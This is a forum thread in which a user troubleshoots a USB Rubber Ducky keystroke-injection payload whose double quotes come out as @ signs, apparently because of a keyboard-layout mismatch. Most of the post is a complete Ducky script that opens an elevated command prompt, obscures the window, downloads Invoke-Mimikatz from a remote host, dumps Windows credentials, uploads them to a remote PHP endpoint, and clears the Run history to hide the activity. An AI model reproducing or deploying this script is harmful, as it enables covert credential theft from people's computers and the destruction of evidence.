@ sign instead of "

[mule]

This is what the rubber ducky is outputting to my CMD window:

Notice that @ signs have been subbed for " marks. I've tried changing the language from GB to US, but that doesn't seem to help either

powershell @IEX (New-Object Net.WebClient).DownloadString('http://someplace.com/im.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('https://someplace.com/rx.php', $output)@

Here's the contents of the file that I pass to ducktools (python.exe ducktools.py -e -l us mimi.txt inject1.bin) to get my inject.bin file

Any help would be greatly appreciated!

Mimi.txt file contents:

REM Title: Invoke mimikatz and send creds to remote server
REM Author: Hak5Darren Props: Mubix, Clymb3r, Gentilkiwi
DELAY 1000
REM Open an admin command prompt 
GUI r
DELAY 500
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 2000
ALT y
DELAY 1000
REM Obfuscate the command prompt
REM STRING mode con:cols=18 lines=1
ENTER
REM STRING color FE
ENTER
REM Download and execute Invoke Mimikatz then upload the results
STRING powershell "IEX (New-Object Net.WebClient).DownloadString('http://someplace.com/im.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('https://someplace.com/rx.php', $output)"
ENTER
DELAY 15000
REM Clear the Run history and exit
STRING powershell Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue
ENTER
STRING exit
ENTER

 

[Dave-ee Jones]

Okay so the "@" signs are popping up in Powershell when you type " ?

[mule]

Yes, in the powershell window is when I'm seeing the @ signs.